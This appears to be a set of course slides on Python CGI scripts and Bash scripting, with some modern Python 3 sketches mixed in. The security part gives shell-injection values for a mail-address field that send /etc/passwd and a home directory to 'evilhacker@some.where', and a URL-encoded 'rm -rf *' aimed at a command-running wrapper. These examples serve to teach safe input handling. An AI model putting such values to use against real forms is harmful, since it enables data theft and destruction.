do not support form.getvalue, use instead
r = form["r"].value |


![]() | Last example: HTML page + CGI script; the result of sin(r) was written on a new Web page |
![]() | Next example: just a CGI script |
![]() | The user stays within the same dynamic page, a la the Scientific Hello World GUI |
![]() | Tasks: extract r, compute sin(r), write HTML form |
![]() | The CGI script calls itself |

#!/store/bin/python
import cgi, math
print "Content-type: text/html\n" # std opening
# extract the value of the variable "r":
form = cgi.FieldStorage()
r = form.getvalue('r')
if r is not None:
    s = str(math.sin(float(r)))
else:
    s = ''; r = ''
# print complete form with value:
print """
<HTML><BODY BGCOLOR="white">
<FORM ACTION="hw2.py.cgi" METHOD="POST">
Hello, World! The sine of
<INPUT TYPE="text" NAME="r" SIZE="10" VALUE="%s">
<INPUT TYPE="submit" VALUE="equals" NAME="equalsbutton">
%s </FORM></BODY></HTML>\n""" % (r,s)
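
The `cgi` module has been removed from recent Python 3 releases (3.13 and later), so the following sketch shows the same logic with `urllib.parse.parse_qs` in Python 3 syntax. The function name `hw2_page` is hypothetical, the query string is passed as an argument so that the logic can be tested without a Web server, and the form uses METHOD="GET" because only GET data arrives in the query string. In a real CGI script the string would typically come from the `QUERY_STRING` environment variable.

```python
import html
import math
from urllib.parse import parse_qs

def hw2_page(query_string):
    """Return the HTML form, filled in with sin(r) if r was submitted."""
    fields = parse_qs(query_string)
    r = fields.get('r', [''])[0]          # first value of r, or '' if missing
    try:
        s = str(math.sin(float(r)))
    except ValueError:                    # empty or non-numeric input
        s = ''
    return """<HTML><BODY BGCOLOR="white">
<FORM ACTION="hw2.py.cgi" METHOD="GET">
Hello, World! The sine of
<INPUT TYPE="text" NAME="r" SIZE="10" VALUE="%s">
<INPUT TYPE="submit" VALUE="equals" NAME="equalsbutton">
%s </FORM></BODY></HTML>""" % (html.escape(r, quote=True), s)

page = hw2_page('r=1.4')
empty_page = hw2_page('')
print(page)
```

Escaping the value with `html.escape` before it is written back into the page keeps user input from being interpreted as HTML.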

![]() | What happens if the CGI script contains an error? |
![]() | Browser just responds "Internal Server Error" -- a nightmare |
![]() | Start your Python CGI scripts with
import cgitb; cgitb.enable()
to turn on nice debugging facilities: Python errors now appear nicely formatted in the browser |

![]() |
Always run the CGI script from the command line before trying it in a browser!
unix> export QUERY_STRING="r=1.4"
unix> ./hw2.py.cgi > tmp.html # don't run python hw2.py.cgi!
unix> cat tmp.html |
![]() | Load tmp.html into a browser and view the result |
![]() | Multiple form variables are set like this:
QUERY_STRING="name=Some Body&phone=+47 22 85 50 50" |

![]() | Permissions you have as CGI script owner are usually different from the permissions of a nobody, e.g., file writing requires write permission for all users |
![]() | Environment variables (PATH, HOME etc.) are normally not available to a nobody |
![]() | Make sure the CGI script is in a directory where CGI scripts are allowed to be executed (some systems require CGI scripts to be in special cgi-bin directories) |
![]() | Check that the header contains the right path to the interpreter on the Web server |
![]() | Good check: log in as another user (you become a nobody!) and try your script |

![]() | Sometimes you need to control environment variables in CGI scripts |
![]() | Example: running your Python with shared libraries
#!/usr/home/me/some/path/to/my/bin/python
...
python requires shared libraries in directories specified by the environment variable LD_LIBRARY_PATH |
![]() | Solution: the CGI script is a shell script that sets up your environment prior to calling your real CGI script |

![]() |
General Bourne Again shell script wrapper:
#!/bin/bash
# usage: www.some.net/url/wrapper-sh.cgi?s=myCGIscript.py
# just set a minimum of environment variables:
export scripting=~inf3330/www_docs/scripting
export SYSDIR=/ifi/ganglot/k00/inf3330/www_docs/packages
export BIN=$SYSDIR/`uname`
export LD_LIBRARY_PATH=$BIN/lib:/usr/bin/X11/lib
export PATH=$scripting/src/tools:/usr/bin:/bin:/store/bin:$BIN/bin
export PYTHONPATH=$SYSDIR/src/python/tools:$scripting/src/tools
# or set up my complete environment (may cause problems):
# source /home/me/.bashrc
# extract CGI script name from QUERY_STRING:
script=`perl -e '$s=$ARGV[0]; $s =~ s/.*=//; \
print $s' $QUERY_STRING`
./$script
|

![]() | Suppose you ask for the user's email in a Web form |
![]() | Suppose the form is processed by this code:
if "mailaddress" in form:
    mailaddress = form.getvalue("mailaddress")
    note = "Thank you!"
    # send a mail:
    mail = os.popen("/usr/lib/sendmail " + mailaddress, 'w')
    mail.write("...")
    mail.close()
|
![]() | What happens if somebody gives this "address":
x; mail evilhacker@some.where < /etc/passwd?? |

![]() |
Another "address":
x; tar cf - /home/hpl | mail evilhacker@some.where
sends out all my files that anybody can read |
![]() | Perhaps my password or credit card number resides in one of these files? |
![]() | The evilhacker can also feed Mb/Gb of data into the system to load the server |
![]() | Rule: Do not copy form input blindly to system commands! |
![]() | Be careful with shell wrappers |

![]() | Could test for bad characters like
&;`'\"|*?~<>^()[]{}$\n\r
|
![]() | Better: test for legal set of characters
# expect text and numbers:
if re.search(r'[^a-zA-Z0-9]', input):
    # stop processing |
![]() | Always be careful when launching shell commands; check for insecure side effects |
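
A sketch of the "legal set of characters" approach applied to the mail address example, in Python 3 syntax. The function names and the pattern are assumptions for illustration; the pattern is deliberately conservative and does not cover the full e-mail address syntax. Building an argument list, instead of one command string, means no shell interprets the address when the command is eventually run.

```python
import re

def is_safe_address(address):
    """Accept only a conservative subset of e-mail address syntax."""
    # fullmatch: the WHOLE string must consist of legal characters;
    # the first character must be alphanumeric so that the address
    # cannot be mistaken for a command-line option
    pattern = r'[A-Za-z0-9][A-Za-z0-9._+-]*@[A-Za-z0-9.-]+'
    return re.fullmatch(pattern, address) is not None

def sendmail_command(address):
    """Build an argument list; no shell is involved when it is run."""
    if not is_safe_address(address):
        raise ValueError('illegal mail address: %r' % address)
    return ['/usr/lib/sendmail', address]

cmd = sendmail_command('someone@some.where')
attack = 'x; mail evilhacker@some.where < /etc/passwd'
attack_accepted = is_safe_address(attack)
# A real script could now run, e.g.,
# subprocess.run(cmd, input=message, text=True)
```

The malicious "address" from the example is rejected because it contains spaces, a semicolon and redirection characters.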

![]() | The shell wrapper script allows execution of a user-given command |
![]() | The command is intended to be the name of a secure CGI script, but the command can be misused |
![]() | Fortunately, the command is prefixed by ./
./$script
so trying an rm -rf *,
http://www.some.where/wrapper-sh.cgi?s="rm+-rf+%2A"
does not work (./rm -rf *; ./rm is not found) |
The encoding of rm -rf * is carried out by
>>> urllib.urlencode({'s':'rm -rf *'})
's=rm+-rf+%2A'
|



![]() | The simviz1.py script has many input parameters, resulting in many form fields | ||||
![]() | We can write a small utility class for
|

class FormParameters:
    "Easy handling of a set of form parameters"
    def __init__(self, form):
        self.form = form # a cgi.FieldStorage() object
        self.parameter = {} # contains all parameters
    def set(self, name, default_value=None):
        "register a new parameter"
        self.parameter[name] = default_value
    def get(self, name):
        """Return the value of the form parameter name."""
        if name in self.form:
            self.parameter[name] = self.form.getvalue(name)
        if name in self.parameter:
            return self.parameter[name]
        else:
            return "No variable with name '%s'" % name

    def tablerow(self, name):
        "print a form entry in a table row"
        print """
        <TR>
        <TD>%s</TD>
        <TD><INPUT TYPE="text" NAME="%s" SIZE=10 VALUE="%s">
        </TR>
        """ % (name, name, self.get(name))
    def tablerows(self):
        "print all parameters in a table of form text entries"
        print "<TABLE>"
        for name in self.parameter.keys():
            self.tablerow(name)
        print "</TABLE>"

form = cgi.FieldStorage()
p = FormParameters(form)
p.set('m', 1.0) # register 'm' with default val. 1.0
p.set('b', 0.7)
...
p.set('case', "tmp1")
# start writing HTML:
print """
<HTML><BODY BGCOLOR="white">
<TITLE>Oscillator code interface</TITLE>
<IMG SRC="%s" ALIGN="left">
<FORM ACTION="simviz1.py.cgi" METHOD="POST">
...
""" % ...
# define all form fields:
p.tablerows()
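
A testable variant of the same utility in Python 3 syntax, given as a sketch under two assumptions: the form is any mapping from field names to submitted strings (an ordinary dictionary here, instead of a `cgi.FieldStorage` object), and the methods return HTML strings instead of printing them. Values are passed through `html.escape` before they are written into the page.

```python
import html

class FormParameters:
    """Hold form parameters; `form` maps names to submitted strings."""
    def __init__(self, form):
        self.form = form
        self.parameter = {}

    def set(self, name, default_value=None):
        """Register a new parameter with a default value."""
        self.parameter[name] = default_value

    def get(self, name):
        """Return the submitted value if present, else the default."""
        if name in self.form:
            self.parameter[name] = self.form[name]
        return self.parameter[name]       # KeyError for unregistered names

    def tablerow(self, name):
        value = html.escape(str(self.get(name)), quote=True)
        return ('<TR><TD>%s</TD>'
                '<TD><INPUT TYPE="text" NAME="%s" SIZE=10 VALUE="%s"></TD></TR>'
                % (name, name, value))

    def tablerows(self):
        rows = [self.tablerow(name) for name in self.parameter]
        return '<TABLE>\n' + '\n'.join(rows) + '\n</TABLE>'

# hypothetical submitted data; 'case' carries a hostile value
p = FormParameters({'b': '0.9', 'case': '"><script>'})
p.set('m', 1.0)
p.set('b', 0.7)
p.set('case', 'tmp1')
table = p.tablerows()
print(table)
```

Returning strings makes the class easy to test from the command line before it is used in a CGI script.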

![]() | We need a complete path to the simviz1.py script |
![]() | simviz1.py calls oscillator so its directory must be in the PATH variable |
![]() | simviz1.py creates a directory and writes files, hence nobody must be allowed to do this |
![]() | Failing to meet these requirements typically gives Internal Server Error... |

# check that the simviz1.py script is available and
# that we have write permissions in the current dir
simviz_script = os.path.join(os.pardir,os.pardir,"intro",
                             "python","simviz1.py")
if not os.path.isfile(simviz_script):
    print "Cannot find <PRE>%s</PRE> "\
          "so it is impossible to perform simulations" % \
          simviz_script
# make sure that simviz1.py finds the oscillator code, i.e.,
# define absolute path to the oscillator code and add to PATH:
osc = '/ifi/ganglot/k00/inf3330/www_docs/scripting/SunOS/bin'
os.environ['PATH'] = ':'.join([os.environ['PATH'],osc])
if not os.path.isfile(osc+'/oscillator'):
    print "The oscillator program was not found "\
          "so it is impossible to perform simulations"
if not os.access(os.curdir, os.W_OK):
    print "Current directory has no write permissions "\
          "so it is impossible to perform simulations"

if form: # run simulator and create plot
    sys.argv[1:] = cmd.split() # simulate command-line args...
    import simviz1 # run simviz1 as a script...
    os.chdir(os.pardir) # compensate for simviz1.py's os.chdir
    case = p.get('case')
    os.chmod(case, 0777) # make sure anyone can delete subdir
    # show PNG image:
    imgfile = os.path.join(case,case+'.png')
    if os.path.isfile(imgfile):
        # make an arbitrary new filename to prevent that browsers
        # may reload the image from a previous run:
        import random
        newimgfile = os.path.join(case,
                     'tmp_'+str(random.uniform(0,2000))+'.png')
        os.rename(imgfile, newimgfile)
        print """<IMG SRC="%s">""" % newimgfile
print '</BODY></HTML>'

![]() | 'Smart' caching strategies may result in old plots being shown |
![]() | Remedy: make a random filename such that the name of the plot changes each time a simulation is run
imgfile = os.path.join(case,case+".png")
if os.path.isfile(imgfile):
    import random
    newimgfile = os.path.join(case,
                 'tmp_'+str(random.uniform(0,2000))+'.png')
    os.rename(imgfile, newimgfile)
    print """<IMG SRC="%s">""" % newimgfile
|
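
A random float from a limited range can, in principle, repeat between runs. One possible variation, sketched here in Python 3 syntax, uses `uuid.uuid4()` to build the new filename; the helper name `rename_to_unique` and the scratch directory are assumptions for this illustration.

```python
import os
import tempfile
import uuid

def rename_to_unique(imgfile):
    """Rename imgfile to tmp_<random hex>.png in the same directory."""
    directory = os.path.dirname(imgfile)
    newimgfile = os.path.join(directory, 'tmp_' + uuid.uuid4().hex + '.png')
    os.rename(imgfile, newimgfile)
    return newimgfile

# Demonstration in a scratch directory:
case = tempfile.mkdtemp()
plot = os.path.join(case, 'plot.png')
open(plot, 'wb').close()              # empty placeholder for a plot file
new_name = rename_to_unique(plot)
print('<IMG SRC="%s">' % new_name)
```

The browser sees a filename it has never loaded before, so a cached image from an earlier run cannot be shown by mistake.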

![]() | We can automate the interaction with a dynamic Web page |
![]() | Consider hw2.py.cgi with one form field r |
![]() | Loading a URL augmented with the form parameter,
http://www.some.where/cgi/hw2.py.cgi?r=0.1
is the same as loading
http://www.some.where/cgi/hw2.py.cgi
and manually filling out the entry with '0.1' |
![]() | We can write a Hello World script that performs the sine computation on a Web server and extracts the value back to the local host |

![]() | Form fields and values can be placed in a dictionary and encoded correctly for use in a URL:
>>> import urllib
>>> p = {'p1':'some string','p2': 1.0/3, 'q1': 'Ødegård'}
>>> params = urllib.urlencode(p)
>>> params
'p2=0.333333333333&q1=%D8deg%E5rd&p1=some+string'
>>> URL = 'http://www.some.where/cgi/somescript.cgi'
>>> f = urllib.urlopen(URL + '?' + params) # GET method
>>> f = urllib.urlopen(URL, params) # POST method
|
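
In Python 3 the encoding function lives in `urllib.parse` (and `urlopen` in `urllib.request`). A short sketch of the encoding step follows, with a modified example dictionary and no network access; note that non-ASCII characters are encoded as UTF-8 by default, so the result for 'Ødegård' differs from the Latin-1 output shown above.

```python
from urllib.parse import urlencode, parse_qs

p = {'p1': 'some string', 'p2': 0.5, 'q1': 'Ødegård'}
params = urlencode(p)
print(params)

# parse_qs reverses the encoding (all values come back as lists of strings):
decoded = parse_qs(params)

# placeholder address taken from the text above:
URL = 'http://www.some.where/cgi/somescript.cgi'
get_url = URL + '?' + params          # GET: parameters are part of the URL
post_data = params.encode('ascii')    # POST: urlopen(URL, post_data) needs bytes

# the shell command from the wrapper discussion is encoded the same way:
encoded_cmd = urlencode({'s': 'rm -rf *'})
```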

import urllib, sys, re
r = float(sys.argv[1])
params = urllib.urlencode({'r': r})
URLroot = 'http://www.ifi.uio.no/~inf3330/scripting/src/py/cgi/'
f = urllib.urlopen(URLroot + 'hw2.py.cgi?' + params)
# grab s (=sin(r)) from the output HTML text:
for line in f.readlines():
    m = re.search(r'"equalsbutton">(.*)$', line)
    if m:
        s = float(m.group(1)); break
print 'Hello, World! sin(%g)=%g' % (r,s)
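
The extraction step can be tested on a sample page without contacting a server. The sketch below, in Python 3 syntax, searches the whole text instead of one line at a time, so it also works when the number is on the line after the button, as in the form printed by the hw2.py.cgi listing. The helper name `extract_sine` and the sample text are assumptions for this illustration.

```python
import re

def extract_sine(html_text):
    """Return the number following the "equalsbutton" field, or None."""
    # \s* skips a possible line break; [^\s<]+ stops at whitespace or a tag
    m = re.search(r'"equalsbutton">\s*([^\s<]+)', html_text)
    if m:
        return float(m.group(1))
    return None

sample = '''<INPUT TYPE="text" NAME="r" SIZE="10" VALUE="0.1">
<INPUT TYPE="submit" VALUE="equals" NAME="equalsbutton">
0.0998334166468 </FORM></BODY></HTML>'''
s = extract_sine(sample)

# a page produced before any value of r has been submitted:
no_value = extract_sine('NAME="equalsbutton">\n </FORM></BODY></HTML>')
print(s, no_value)
```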

![]() | We can run our simviz1.py type of script such that the computations and generation of plots are performed on a server |
![]() | Our interaction with the computations is a front-end script to simviz1.py.cgi |
![]() | User interface of our script: same as simviz1.py |
![]() | Translate command-line args to a dictionary |
![]() | Encode the dictionary (form field names and values) |
![]() | Open an augmented URL (i.e. run computations) |
![]() | Retrieve plot files from the server |
![]() | Display plot on local host |

import math, urllib, sys, os, re
# load command-line arguments into dictionary:
p = {'case': 'tmp1', 'm': 1, 'b': 0.7, 'c': 5, 'func': 'y',
     'A': 5, 'w': 2*math.pi, 'y0': 0.2, 'tstop': 30, 'dt': 0.05}
for i in range(1, len(sys.argv)-1):
    name = sys.argv[i].lstrip('-')  # accept m, -m or --m
    if name in p:
        p[name] = sys.argv[i+1]
params = urllib.urlencode(p)
URLroot = 'http://www.ifi.uio.no/~inf3330/scripting/src/py/cgi/'
f = urllib.urlopen(URLroot + 'simviz1.py.cgi?' + params)
# get PostScript file:
file = p['case'] + '.ps'
urllib.urlretrieve('%s%s/%s' % (URLroot,p['case'],file), file)
# the PNG file has a random number; get the filename from
# the output HTML file of the simviz1.py.cgi script:
for line in f.readlines():
    m = re.search(r'IMG SRC="(.*)"', line)
    if m:
        imgurl = m.group(1).strip(); break
# IMG SRC already contains the case directory (e.g. tmp1/tmp_xxx.png):
file = os.path.basename(imgurl)
urllib.urlretrieve(URLroot + imgurl, file)
os.system('display ' + file)


![]() | The original scripting languages were (extensions of) command interpreters in operating systems |
![]() | Primary example: Unix shells |
![]() | Bourne shell (sh) was the first major shell |
![]() | C and TC shell (csh and tcsh) had improved command interpreters, but were less popular than Bourne shell for programming |
![]() | Bourne Again shell (Bash/bash): GNU/FSF improvement of Bourne shell |
![]() | Other Bash-like shells: Korn shell (ksh), Z shell (zsh) |
![]() | Bash is the dominating Unix shell today |

![]() | Learning Bash means learning Unix |
![]() | Learning Bash means learning the roots of scripting (Bourne shell is a subset of Bash) |
![]() | Shell scripts, especially in Bourne shell and Bash, are frequently encountered on Unix systems |
![]() | Bash is widely available (open source) and the dominating command interpreter and scripting language on today's Unix systems |
![]() | Shell scripts are often used to glue more advanced scripts in Perl and Python |

![]() | Greg Wilson's excellent online course: http://www.swc.scipy.org |
![]() | man bash |
![]() | ``Introduction to and overview of Unix'' link in doc.html |

![]() | Let's start with a script writing "Hello, World!" |
![]() | Scientific computing extension: compute the sine of a number as well |
![]() | The script (hw.sh) should be run like this:
./hw.sh 3.4
or (less common):
bash hw.sh 3.4 |
![]() | Output:
Hello, World! sin(3.4)=-0.255541102027 |

![]() | how to read a command-line argument |
![]() | how to call a math (sine) function |
![]() | how to work with variables |
![]() | how to print text and numbers |

![]() | We use plain Bourne shell (/bin/sh) when special features of Bash (/bin/bash) are not needed |
![]() | Most of our examples can in fact be run under Bourne shell (and of course also Bash) |
![]() | Note that Bourne shell (/bin/sh) is usually just a link to Bash (/bin/bash) on Linux systems (Bourne shell is proprietary code, whereas Bash is open source) |

#!/bin/sh
r=$1 # store first command-line argument in r
s=`echo "s($r)" | bc -l`
# print to the screen:
echo "Hello, World! sin($r)=$s"

![]() | The first line specifies the interpreter of the script (here /bin/sh, could also have used /bin/bash) |
![]() | The command-line variables are available as the script variables
$1 $2 $3 $4 and so on |
![]() | Variables are initialized as
r=$1
while the value of r requires a dollar prefix:
my_new_variable=$r # copy r to my_new_variable |

![]() | Bourne shell and Bash have very little built-in math; we therefore need to use bc, Perl or Awk to do the math
s=`echo "s($r)" | bc -l`
s=`perl -e '$s=sin($ARGV[0]); print $s;' $r`
s=`awk "BEGIN { s=sin($r); print s;}"`
# or shorter:
s=`awk "BEGIN {print sin($r)}"`
|
![]() | Back quotes mean executing the command inside the quotes and assigning the output to the variable on the left-hand side
some_variable=`some Unix command`
# alternative notation:
some_variable=$(some Unix command) |

![]() | bc = interactive calculator |
![]() | Documentation: man bc |
![]() | bc -l means bc with math library |
![]() | Note: sin is s, cos is c, exp is e |
![]() | echo sends a text to be interpreted by bc and bc responds with output (which we assign to s)
variable=`echo "math expression" | bc -l` |

![]() | The echo command is used for writing:
echo "Hello, World! sin($r)=$s"
and variables can be inserted in the text string (variable interpolation) |
![]() | Bash also has a printf function for format control:
printf "Hello, World! sin(%g)=%12.5e\n" $r $s |
![]() | cat is usually used for printing multi-line text (see next slide) |

![]() | Each source code line is printed prior to its execution if you give -x as option to /bin/sh or /bin/bash |
![]() | Either in the header
#!/bin/sh -x
or on the command line:
unix> /bin/sh -x hw.sh
unix> sh -x hw.sh
unix> bash -x hw.sh |
![]() | Very convenient during debugging |

![]() | Bourne shell and Bash are not much used for file reading and manipulation; usually one calls up Sed, Awk, Perl or Python to do file manipulation |
![]() | File writing is efficiently done by 'here documents':
cat > myfile <<EOF
multi-line text
can now be inserted here,
and variable interpolation
a la $myvariable is
supported. The final EOF must
start in column 1 of the
script file.
EOF
|

![]() | Typical application in numerical simulation: |
![]() | Programs are supposed to run in batch |
![]() | Putting the two commands in a file, with some glue, makes a classical Unix script |

#!/bin/sh
pi=3.14159
m=1.0; b=0.7; c=5.0; func="y"; A=5.0;
w=`echo 2*$pi | bc`
y0=0.2; tstop=30.0; dt=0.05; case="tmp1"
screenplot=1

# read variables from the command line, one by one:
while [ $# -gt 0 ]   # $# = no of command-line args.
do
    option=$1;   # load command-line arg into option (no spaces around =)
    shift;       # eat currently first command-line arg
    case "$option" in
        -m)
            m=$1; shift; ;;  # load next command-line arg
        -b)
            b=$1; shift; ;;
        ...
        *)
            echo "$0: invalid option \"$option\""; exit ;;
    esac
done

case "$option" in
    -m)
        m=$1; shift; ;;  # load next command-line arg
    -b)
        b=$1; shift; ;;
    *)
        echo "$0: invalid option \"$option\""; exit ;;
esac
versus
if [ "$option" == "-m" ]; then
    m=$1; shift;  # load next command-line arg
elif [ "$option" == "-b" ]; then
    b=$1; shift;
else
    echo "$0: invalid option \"$option\""; exit
fi

dir=$case
# check if $dir is a directory:
if [ -d $dir ]
  # yes, it is; remove this directory tree
  then
    rm -r $dir
fi
mkdir $dir # create new directory $dir
cd $dir # move to $dir
# the 'then' statement can also appear on the 1st line:
if [ -d $dir ]; then
  rm -r $dir
fi
# another form of if-tests:
if test -d $dir; then
  rm -r $dir
fi
# and a shortcut:
[ -d $dir ] && rm -r $dir
test -d $dir && rm -r $dir

# write to $case.i the lines that appear between
# the EOF symbols:
cat > $case.i <<EOF
$m
$b
$c
$func
$A
$w
$y0
$tstop
$dt
EOF

![]() | Stand-alone programs can be run by just typing the name of the program |
![]() | If the program reads data from standard input, we can put the input in a file and redirect input:
oscillator < $case.i |
![]() | Can check for successful execution:
# the shell variable $? is 0 if last command
# was successful, otherwise $? != 0
if [ "$?" != "0" ]; then
  echo "running oscillator failed"; exit 1
fi
# exit n sets $? to n |

![]() | Variables can in Bash be integers, strings or arrays |
![]() | For safety, declare the type of a variable if it is not a string:
declare -i i # i is an integer
declare -a A # A is an array |

![]() | Comparison of two integers uses a different syntax than comparison of two strings:
if [ $i -lt 10 ]; then # integer comparison
if [ "$name" == "10" ]; then # string comparison |
![]() | Unless you have declared a variable to be an integer, assume that all variables are strings and use double quotes (strings) when comparing variables in an if test
if [ "$?" != "0" ]; then # this is safe
if [ $? != 0 ]; then # might be unsafe |

![]() | Make Gnuplot script:
echo "set title '$case: m=$m ...'" > $case.gnuplot
...
# continue writing with a here document:
cat >> $case.gnuplot <<EOF
set size ratio 0.3 1.5, 1.0;
...
plot 'sim.dat' title 'y(t)' with lines;
...
EOF
|
![]() | Run Gnuplot:
gnuplot -geometry 800x200 -persist $case.gnuplot
if [ "$?" != "0" ]; then
  echo "running gnuplot failed"; exit 1
fi |

![]() | file writing |
![]() | for-loops |
![]() | running an application |
![]() | pipes |
![]() | writing functions |
![]() | file globbing, testing file types |
![]() | copying and renaming files, creating and moving to directories, creating directory paths, removing files and directories |
![]() | directory tree traversal |
![]() | packing directory trees |

outfilename="myprog2.cpp"
# append multi-line text (here document):
cat >> $outfilename <<EOF
/*
  This file, "$outfilename", is a version
  of "$infilename" where each line is numbered.
*/
EOF
# other applications of cat:
cat myfile # write myfile to the screen
cat myfile > yourfile # write myfile to yourfile
cat myfile >> yourfile # append myfile to yourfile
cat myfile | wc # send myfile as input to wc

![]() | The for element in list construction:
files=`/bin/ls *.tmp`
# we use /bin/ls in case ls is aliased
for file in $files
do
  echo removing $file
  rm -f $file
done |
![]() | Traverse command-line arguments:
for arg; do
  # do something with $arg
done
# or full syntax; command-line args are stored in $@
for arg in $@; do
  # do something with $arg
done |

![]() | Declare an integer counter:
declare -i counter
counter=0
# arithmetic expressions must appear inside (( ))
((counter++))
echo $counter # yields 1 |
![]() | For-loop with counter:
declare -i n; n=1
for arg in $@; do
  echo "command-line argument no. $n is <$arg>"
  ((n++))
done |

declare -i i
for ((i=0; i<$n; i++)); do
  echo $i
done

![]() | Pack a series of files into one file |
![]() | Executing this single file as a Bash script unpacks all the individual files again (!) |
![]() | Usage:
bundle file1 file2 file3 > onefile # pack
bash onefile # unpack |
![]() | Writing bundle is easy:
#!/bin/sh
for i in $@; do
  echo "echo unpacking file $i"
  echo "cat > $i <<EOF"
  cat $i
  echo "EOF"
done
|
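
For comparison, the same packing idea can be sketched in Python 3. The function name `bundle` mirrors the shell script; the scratch file and its contents are made up for the demonstration. One deliberate difference, which is an assumption of this sketch and not part of the script above: the delimiter is written as `'EOF'` in quotes, which tells the shell not to interpolate `$variables` in the packed text when the bundle is unpacked.

```python
import os
import tempfile

def bundle(filenames):
    """Return the text of a shell script that recreates the given files."""
    parts = []
    for name in filenames:
        with open(name) as f:
            content = f.read()
        if not content.endswith('\n'):
            content += '\n'   # the closing EOF must start on its own line
        parts.append('echo unpacking file %s\n' % name)
        # a quoted delimiter ('EOF') switches off $variable interpolation
        # at unpack time; the shell version above uses a plain EOF
        parts.append("cat > %s <<'EOF'\n" % name)
        parts.append(content)
        parts.append('EOF\n')
    return ''.join(parts)

# demonstration on a scratch file (hypothetical content)
workdir = tempfile.mkdtemp()
file1 = os.path.join(workdir, 'file1')
with open(file1, 'w') as f:
    f.write('Hello, World!\nNo sine computations today\n')

script = bundle([file1])
print(script)
```

Both versions share one limitation: a packed file that itself contains a line consisting only of `EOF` ends the here document too early.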

![]() | Consider 2 fake files; file1
Hello, World!
No sine computations today
and file2
1.0 2.0 4.0
0.1 0.2 0.4 |
![]() | Running bundle file1 file2 yields the output
echo unpacking file file1
cat > file1 <<EOF
Hello, World!
No sine computations today
EOF
echo unpacking file file2
cat > file2 <<EOF
1.0 2.0 4.0
0.1 0.2 0.4
EOF
|

![]() | Running in the foreground:
cmd="myprog -c file.1 -p -f -q";
$cmd < my_input_file
# output is directed to the file res
$cmd < my_input_file > res
# process res file by Sed, Awk, Perl or Python |
![]() | Running in the background:
myprog -c file.1 -p -f -q < my_input_file &
or stop a foreground job with Ctrl-Z and then type bg |

![]() | Output from one command can be sent as input to another command via a pipe
# send files with size to sort -rn
# (reverse numerical sort) to get a list
# of files sorted after their sizes:
/bin/ls -s | sort -rn
cat $case.i | oscillator
# is the same as
oscillator < $case.i |
![]() | Make a new application: sort all files in a directory
tree root, with the largest files appearing first, and
equip the output with paging functionality:
du -a root | sort -rn | less |

echo "s(1.2)" | bc -l # the sine of 1.2
# -l loads the math library for bc
echo "e(1.2) + c(0)" | bc -l # exp(1.2)+cos(0)
# assignment:
s=`echo "s($r)" | bc -l`
# or using Perl:
s=`perl -e "print sin($r)"`

# compute x^5*exp(-x) if x>=0, else 0 :
function calc() {
  echo "
  if ( $1 >= 0.0 ) {
    ($1)^5*e(-($1))
  } else {
    0.0
  } " | bc -l
}
# function arguments: $1 $2 $3 and so on
# return value: last statement
# call:
r=4.2
s=`calc $r`

#!/bin/bash
function statistics {
  avg=0; n=0
  for i in $@; do
    avg=`echo $avg + $i | bc -l`
    n=`echo $n + 1 | bc -l`
  done
  avg=`echo $avg/$n | bc -l`
  max=$1; min=$1; shift;
  for i in $@; do
    if [ `echo "$i < $min" | bc -l` != 0 ]; then
      min=$i; fi
    if [ `echo "$i > $max" | bc -l` != 0 ]; then
      max=$i; fi
  done
  printf "%.3f %g %g\n" $avg $min $max
}

statistics 1.2 6 -998.1 1 0.1
# statistics returns a list of numbers
res=`statistics 1.2 6 -998.1 1 0.1`
for r in $res; do echo "result=$r"; done
echo "average, min and max = $res"
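
As a point of comparison, here is a minimal Python 3 sketch of the same computation. It keeps the function name `statistics` and the output format of the Bash version; everything else (the tuple return value, the variable names) is a choice made for this illustration. Floating-point arithmetic is built in, so no external calculator such as bc is needed.

```python
def statistics(*numbers):
    """Return (average, minimum, maximum) of the arguments."""
    # accept strings as well as numbers, as the shell version does
    values = [float(x) for x in numbers]
    avg = sum(values) / len(values)
    return avg, min(values), max(values)

avg, smallest, largest = statistics(1.2, 6, -998.1, 1, 0.1)
# same format as the printf call in the Bash function
result = '%.3f %g %g' % (avg, smallest, largest)
print(result)
```

The Bash function hands back its results as printed text that the caller must split again, whereas the Python function returns the three numbers directly.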

![]() | List all .ps and .gif files using wildcard notation:
files=`ls *.ps *.gif`
# or safer, if you have aliased ls:
files=`/bin/ls *.ps *.gif`
# compress and move the files:
gzip $files
for file in $files; do
  mv ${file}.gz $HOME/images
done
|

if [ -f $myfile ]; then
  echo "$myfile is a plain file"
fi
# or equivalently:
if test -f $myfile; then
  echo "$myfile is a plain file"
fi
if [ ! -d $myfile ]; then
  echo "$myfile is NOT a directory"
fi
if [ -x $myfile ]; then
  echo "$myfile is executable"
fi
# -s is true for an existing file of size > 0
# (-z tests for an empty string, not an empty file):
[ ! -s $myfile ] && echo "empty file $myfile"

# rename $myfile to tmp.1:
mv $myfile tmp.1
# force renaming:
mv -f $myfile tmp.1
# move a directory tree mytree to $root:
mv mytree $root
# copy myfile to $tmpfile:
cp myfile $tmpfile
# copy a directory tree mytree recursively to $root:
cp -r mytree $root
# remove myfile and all files with suffix .ps:
rm myfile *.ps
# remove a non-empty directory tmp/mydir:
rm -r tmp/mydir

# make directory:
dir="mynewdir";
mkdir $dir
mkdir -m 0755 $dir # readable for all
mkdir -m 0700 $dir # readable for owner only
mkdir -m 0777 $dir # all rights for all
# move to $dir
cd $dir
# move to $HOME
cd
# create intermediate directories (the whole path):
mkdirhier $HOME/bash/projects/test1
# or with GNU mkdir:
mkdir -p $HOME/bash/projects/test1

![]() | find visits all files in a directory tree and can execute one or more commands for every file |
![]() | Basic example: find the oscillator codes
find $scripting/src -name 'oscillator*' -print |
![]() | Or find all PostScript files
find $HOME \( -name '*.ps' -o -name '*.eps' \) -print |
![]() | We can also run a command for each file:
find rootdir -name filenamespec -exec command {} \; -print
# {} is the current filename
|

![]() |
Find all files larger than 2000 blocks of 512 bytes (about 1 MB):
find $HOME -name '*' -type f -size +2000 -exec ls -s {} \;
|
![]() | Remove all these files:
find $HOME -name '*' -type f -size +2000 \
-exec ls -s {} \; -exec rm -f {} \;
or ask the user for permission to remove:
find $HOME -name '*' -type f -size +2000 \
-exec ls -s {} \; -ok rm -f {} \;
|

![]() | Find all files that have not been accessed for the last 90 days:
find $HOME -name '*' -atime +90 -print
and move these to /tmp/trash:
find $HOME -name '*' -atime +90 -print \
  -exec mv -f {} /tmp/trash \;
|
![]() | Note: this one does seemingly nothing...
find ~hpl/projects -name '*.tex'
on older Unix versions of find, because it lacks the -print option for printing the names of all *.tex files (common mistake); GNU find and other POSIX-conforming versions print the names by default when no action is given |
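
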